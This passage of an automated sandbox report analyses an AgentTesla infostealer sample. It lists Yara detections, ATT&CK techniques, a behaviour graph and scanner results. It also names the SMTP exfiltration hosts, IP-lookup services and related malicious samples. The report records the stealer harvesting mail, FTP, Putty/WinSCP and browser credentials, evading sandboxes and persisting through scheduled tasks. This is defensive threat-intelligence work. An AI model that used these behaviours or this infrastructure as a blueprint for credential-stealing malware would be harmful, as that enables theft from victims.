                    Source: Yara matchFile source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 3892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 2760, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XNYbGrcoFr.exe PID: 5096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XNYbGrcoFr.exe PID: 5308, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 3892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GestorRemesasCONFIRMIMING.exe PID: 2760, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XNYbGrcoFr.exe PID: 5096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: XNYbGrcoFr.exe PID: 5308, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		34
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS631
                    Security Software Discovery                    		Distributed Component Object Model1
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets1
                    Process Discovery                    		SSHKeylogging23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials261
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447920 Sample: GestorRemesasCONFIRMIMING.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 42 us2.smtp.mailhostbox.com 2->42 44 smtp.santonswitchgears.com 2->44 46 2 other IPs or domains 2->46 54 Snort IDS alert for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 12 other signatures 2->60 8 GestorRemesasCONFIRMIMING.exe 7 2->8         started        12 XNYbGrcoFr.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\XNYbGrcoFr.exe, PE32 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmpCF9B.tmp, XML 8->40 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->66 74 4 other signatures 8->74 14 GestorRemesasCONFIRMIMING.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        68 Antivirus detection for dropped file 12->68 70 Multi AV Scanner detection for dropped file 12->70 72 Machine Learning detection for dropped file 12->72 24 XNYbGrcoFr.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 48 ip-api.com 208.95.112.1, 49703, 49708, 80 TUT-ASUS United States 14->48 50 us2.smtp.mailhostbox.com 208.91.198.143, 49705, 49709, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->50 52 api.ipify.org 172.67.74.152, 443, 49702, 49707 CLOUDFLARENETUS United States 14->52 76 Loading BitLocker PowerShell Module 18->76 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->78 80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal ftp login credentials 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 36 conhost.exe 26->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    GestorRemesasCONFIRMIMING.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    GestorRemesasCONFIRMIMING.exe58%VirustotalBrowse
                    GestorRemesasCONFIRMIMING.exe100%AviraTR/AD.GenSteal.wukbo
                    GestorRemesasCONFIRMIMING.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe100%AviraTR/AD.GenSteal.wukbo
                    C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://us2.smtp.mailhostbox.com0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    http://ip-api.com0%URL Reputationsafe
                    http://tempuri.org/DataSet1.xsdIDataAccessLayer.Properties.Resources0%Avira URL Cloudsafe
                    http://smtp.santonswitchgears.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    		208.91.198.143
                    		truetrue
                      		unknown
                      api.ipify.org
                      		172.67.74.152
                      		truefalse
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truetrue
                          		unknown
                          smtp.santonswitchgears.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                            • URL Reputation: safe
                            		unknown
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.orgGestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://account.dyn.com/GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://smtp.santonswitchgears.comGestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.ipify.org/tGestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://us2.smtp.mailhostbox.comGestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGestorRemesasCONFIRMIMING.exe, 00000000.00000002.2123183348.000000000260A000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2166350943.000000000285A000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://tempuri.org/DataSet1.xsdIDataAccessLayer.Properties.ResourcesGestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.comGestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            208.91.198.143
                            		us2.smtp.mailhostbox.comUnited States
                            		394695PUBLIC-DOMAIN-REGISTRYUStrue
                            208.95.112.1
                            		ip-api.comUnited States
                            		53334TUT-ASUStrue
                            172.67.74.152
                            		api.ipify.orgUnited States
                            		13335CLOUDFLARENETUSfalse

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1447920
                            Start date and time:2024-05-27 12:29:57 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 10m 59s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:GestorRemesasCONFIRMIMING.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@19/15@3/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 196
                            • Number of non-executed functions: 9
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            06:30:43API Interceptor7838442x Sleep call for process: GestorRemesasCONFIRMIMING.exe modified
                            06:30:45API Interceptor32x Sleep call for process: powershell.exe modified
                            06:30:48API Interceptor5683084x Sleep call for process: XNYbGrcoFr.exe modified
                            12:30:47Task SchedulerRun new task: XNYbGrcoFr path: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.91.198.143Proforma Invoice.exeGet hashmaliciousAgentTeslaBrowse
                              rPAGO_8732.exeGet hashmaliciousAgentTeslaBrowse
                                Invoice KIK-1 P234478.exeGet hashmaliciousAgentTeslaBrowse
                                  Quote.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    SecuriteInfo.com.TrojanX-gen.21872.19160.exeGet hashmaliciousAgentTeslaBrowse
                                      ceb61a3c32747d2a429f03e2f203c8fa617b18b8d544a514ecbff042243e80f6_payload.exeGet hashmaliciousAgentTeslaBrowse
                                        THA-02187.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          mC7Uei8s0EHz22P.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            order KHLN2024011801.exeGet hashmaliciousAgentTeslaBrowse
                                              MT 103.exeGet hashmaliciousAgentTeslaBrowse
                                                208.95.112.1documentos.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                PI-236031.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                99200032052824.bat.exeGet hashmaliciousGuLoaderBrowse
                                                • ip-api.com/line/?fields=hosting
                                                PO_27052024.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Reiven RFQ-27-05-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                ev1NIvTd6f.exeGet hashmaliciousUnknownBrowse
                                                • /json/
                                                https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDEGet hashmaliciousDCRatBrowse
                                                • ip-api.com/line/?fields=hosting
                                                uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
                                                • ip-api.com/line/?fields=hosting
                                                uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
                                                • ip-api.com/line/?fields=hosting
                                                172.67.74.152K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/
                                                stub.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/
                                                stub.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/
                                                Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/?format=json
                                                Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/?format=json
                                                Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/?format=json
                                                SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                • api.ipify.org/?format=json

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                us2.smtp.mailhostbox.comPurchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.223
                                                ASCD0001 INQ9829......pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.225
                                                Best Price.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.225
                                                Proforma Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.198.143
                                                DHL BL Draft copy.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.224
                                                Draft BL copy.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.223
                                                Swift_copy.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.224
                                                Pliego+Tcnico+-+Desmontaje+de+puerta+y+.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.223
                                                RFQ11087.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.225
                                                rPAGO_8732.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.198.143
                                                ip-api.comdocumentos.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                PI-236031.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                99200032052824.bat.exeGet hashmaliciousGuLoaderBrowse
                                                • 208.95.112.1
                                                PO_27052024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Reiven RFQ-27-05-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                ev1NIvTd6f.exeGet hashmaliciousUnknownBrowse
                                                • 208.95.112.1
                                                https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDEGet hashmaliciousDCRatBrowse
                                                • 208.95.112.1
                                                uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
                                                • 208.95.112.1
                                                uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
                                                • 208.95.112.1
                                                api.ipify.orgDRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 172.67.74.152
                                                INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                https://attachments.office.net/owa/cmangava%40tharisa.com/service.svc/s/GetAttachmentThumbnail?id=AAMkAGE2N2U5NmFkLWIzMjEtNGMwNS1iOWVlLWExNTBkNDk2NTZjMABGAAAAAAAsNFCwuPDISrln6MRbSR5lBwBC4JDOFd8jTJozG%2BNc7YRrAAAAmcUBAABu3YNoqzF8SLI68HoWeAXzAAFRD3sAAAABEgAQAOXLRvcdfU5Kkg7Zx598XsI%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.eyJvcmlnaW4iOiJodHRwczovL291dGxvb2sub2ZmaWNlLmNvbSIsInVjIjoiNTIyZjRhMmM0ZWRmNDA4NjkxMWIwMGFjYzE2ZjgzNzEiLCJzaWduaW5fc3RhdGUiOlsiZHZjX21uZ2QiLCJkdmNfY21wIiwiZHZjX2RtamQiLCJpbmtub3dubnR3ayJdLCJ2ZXIiOiJFeGNoYW5nZS5DYWxsYmFjay5WMSIsImFwcGN0eHNlbmRlciI6Ik93YURvd25sb2FkQDliMDgyOWI5LWJlMzktNDMzNi1hNzY2LWY4YzlkYzJjNzFhNCIsImlzc3JpbmciOiJXVyIsImFwcGN0eCI6IntcIm1zZXhjaHByb3RcIjpcIm93YVwiLFwicHVpZFwiOlwiMTE1MzkwNjY2MTMxNDQwNDI4NFwiLFwic2NvcGVcIjpcIk93YURvd25sb2FkXCIsXCJvaWRcIjpcIjUyMjAyODA5LWJkODUtNGZmOC04NTUwLTRjNzUwZjNhODNlZFwiLFwicHJpbWFyeXNpZFwiOlwiUy0xLTUtMjEtMTAxMjEyODM0Ni0xNjc3NDQzNDQtMTE3Njg1Mjg2MS0xMzc4MTQ4OVwifSIsIm5iZiI6MTcxNjc5NjM3MCwiZXhwIjoxNzE2Nzk2NjcwLCJpc3MiOiIwMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDBAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiYXVkIjoiMDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL2F0dGFjaG1lbnRzLm9mZmljZS5uZXRAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiaGFwcCI6Im93YSJ9.QgmzIBWvZG6gLwDV2SGPl9TdStXctQrpU_xiIGcL5I4eoVDkUPzqcKcrSAnwOD_E73nNMbCTWC-kgcJIIFGhLmh8iFWITRD5MwmaJN23JV7c8rlmzHlxnoqm8tPo98Soui3XZZYSaJZVTruXDBhUCiweHA69qYSoZDJxVUYZDvl5KvXMWJkA_ui0Vq1Sw7pPL5h9t4_QlGAarVBz6O9q21EGSBoX_hWPpcaEGJwoBDVeI-G6VvbkXzy9bJEMEZ6N-WzLyQtuKS9HVJBafIkUxsf0pIhhnJUluyukhnQ1dZohnpQr8e5v0Xoa3SObMFt_C5SeZHG2hFyxqFdeBhKQ_w&X-OWA-CANARY=X-OWA-CANARY_cookie_is_null_or_empty&owa=outlook.office.com&scriptVer=20240517003.15&clientId=1A63CAED249649AEBB5264A13128C2B5&animation=true&persistenceId=80cb7b14-7011-42b1-acde-250d928510f9Get hashmaliciousHTMLPhisherBrowse
                                                • 104.26.13.205
                                                PO_27052024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205
                                                Remittance#26856.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 104.26.13.205
                                                https://interface01.nsxtlmv.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                • 104.26.13.205
                                                http://christiantensen478345.pages.dev/help/contact/45367900411236/Get hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                https://louiss-comxinh.pages.dev/help/contact/388061959224233Get hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                http://worker-office-onedrive.td5xtn-b1lv7f1ymscd0.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                                                • 172.67.74.152

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PUBLIC-DOMAIN-REGISTRYUSPurchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.223
                                                file.exeGet hashmaliciousSystemBCBrowse
                                                • 103.211.216.137
                                                http://dhl.de-globe.cloud.yaazhiyas.in/portal.php?country.x=Global&one=ok&flowId=ul&_Email=dataGet hashmaliciousUnknownBrowse
                                                • 204.11.58.150
                                                https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4Get hashmaliciousHTMLPhisherBrowse
                                                • 208.91.198.178
                                                PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • 103.21.58.98
                                                https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4Get hashmaliciousHTMLPhisherBrowse
                                                • 208.91.198.178
                                                https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4Get hashmaliciousHTMLPhisherBrowse
                                                • 208.91.198.178
                                                SwiftCopy_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 103.21.58.98
                                                ASCD0001 INQ9829......pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.91.199.225
                                                Quotation - 00645.exeGet hashmaliciousAgentTeslaBrowse
                                                • 199.79.62.115
                                                TUT-ASUSdocumentos.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                PI-236031.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                99200032052824.bat.exeGet hashmaliciousGuLoaderBrowse
                                                • 208.95.112.1
                                                PO_27052024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Reiven RFQ-27-05-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                ev1NIvTd6f.exeGet hashmaliciousUnknownBrowse
                                                • 208.95.112.1
                                                https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDEGet hashmaliciousDCRatBrowse
                                                • 208.95.112.1
                                                uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
                                                • 208.95.112.1
                                                uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
                                                • 208.95.112.1
